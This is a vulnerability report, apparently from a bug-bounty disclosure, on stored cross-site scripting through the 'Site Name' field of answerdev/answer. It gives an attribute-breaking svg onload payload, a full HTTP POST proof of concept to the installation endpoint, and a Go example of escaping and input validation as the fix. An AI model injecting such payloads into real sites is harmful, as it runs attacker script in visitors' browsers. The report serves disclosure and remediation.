Stored XSS in answerdev/answer
Reported on
Feb 10th 2023
Description
answer lets an administrator customize the "Site Name" during installation or later in the settings page. Because the value is not properly sanitized or escaped, arbitrary HTML can be stored in this field, which allows execution of attacker-controlled JavaScript.
The stored payload is triggered every time a user loads the website.
Injected payload
"><svg onload=alert(1)//
Vulnerable endpoint:
- https://<yourdomain>/admin/general
- https://<yourdomain>/installation/base-info
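To make the bug class concrete, the following Go program is an added example written for this page; it is not answer's own code and it does not claim to match the project's real template or validation logic. It renders the report's payload through a hypothetical page fragment (an assumption) twice: once with text/template, which interpolates the stored value verbatim and so reproduces the injection, and once with html/template, whose context-aware escaping is the output-side fix. It also shows a defence-in-depth input check, `validateSiteName`, that the settings and installation handlers could apply before storing the value (an example policy, not one the project documents).

```go
package main

import (
	"errors"
	"fmt"
	htmltemplate "html/template"
	"strings"
	texttemplate "text/template"
	"unicode/utf8"
)

// Payload from the report above, used here as constructed test input.
const reportPayload = `"><svg onload=alert(1)//`

// Hypothetical page fragment (an assumption, not answer's real template):
// the site name is placed inside an attribute value, in <title>, and in an
// element body, which is the shape the attribute-breaking payload targets.
const pageTmpl = `<title>{{.SiteName}}</title><a href="/" title="{{.SiteName}}">{{.SiteName}}</a>`

type pageData struct{ SiteName string }

// renderUnsafe reproduces the bug class: text/template interpolates the stored
// value verbatim, so `">` closes the title attribute and <svg onload=...> runs.
func renderUnsafe(siteName string) string {
	t := texttemplate.Must(texttemplate.New("page").Parse(pageTmpl))
	var sb strings.Builder
	if err := t.Execute(&sb, pageData{SiteName: siteName}); err != nil {
		panic(err)
	}
	return sb.String()
}

// renderSafe is the fix on the output side: html/template escapes each
// interpolation for its context (attribute value, RCDATA inside <title>,
// element body), so the same stored string is rendered as inert text.
func renderSafe(siteName string) string {
	t := htmltemplate.Must(htmltemplate.New("page").Parse(pageTmpl))
	var sb strings.Builder
	if err := t.Execute(&sb, pageData{SiteName: siteName}); err != nil {
		panic(err)
	}
	return sb.String()
}

// validateSiteName is a defence-in-depth input check for the settings and
// installation handlers (an example policy, assumed for this demonstration):
// a site name has no business containing tag or quote characters, and a
// length cap limits what an admin account can inject into every page.
// It deliberately allows "&" so that names such as "Answer Q&A" still work;
// output escaping, not input filtering, is what makes "&" safe.
func validateSiteName(name string) error {
	name = strings.TrimSpace(name)
	switch {
	case name == "" || !utf8.ValidString(name):
		return errors.New("site name must be non-empty, valid UTF-8")
	case utf8.RuneCountInString(name) > 64:
		return errors.New("site name must be at most 64 characters")
	case strings.ContainsAny(name, "<>\"'`"):
		return errors.New("site name must not contain HTML markup characters")
	}
	return nil
}

func main() {
	fmt.Println("unsafe:  ", renderUnsafe(reportPayload))
	fmt.Println("safe:    ", renderSafe(reportPayload))
	fmt.Println("validate:", validateSiteName(reportPayload))
	fmt.Println("validate:", validateSiteName("Answer Q&A"))
}
```

The escaped output keeps the payload visible as text (`&lt;svg ...`) in all three positions, so no tag is created and no event handler runs. The input check is a second layer, not a substitute for escaping: an attacker who finds another field that reaches the page unescaped would bypass it.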
Proof of Concept (installation page)
POST /installation/base-info HTTP/1.1
Host: localhost:9080
Content-Length: 175
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/install
Accept-Encoding: gzip, deflate
Connection: close
{"lang":"en_US","site_name":"\"><svg onload=alert(1)//","site_url":"http://localhost:9080","contact_email":"aaa@aaa.ss","name":"admin","password":"admin","email":"aaa@aaa.ss"}
I hope I was helpful.
Impact
The impact is JavaScript execution in the browser of every user who visits the site. However, admin privileges are required to edit the vulnerable input fields.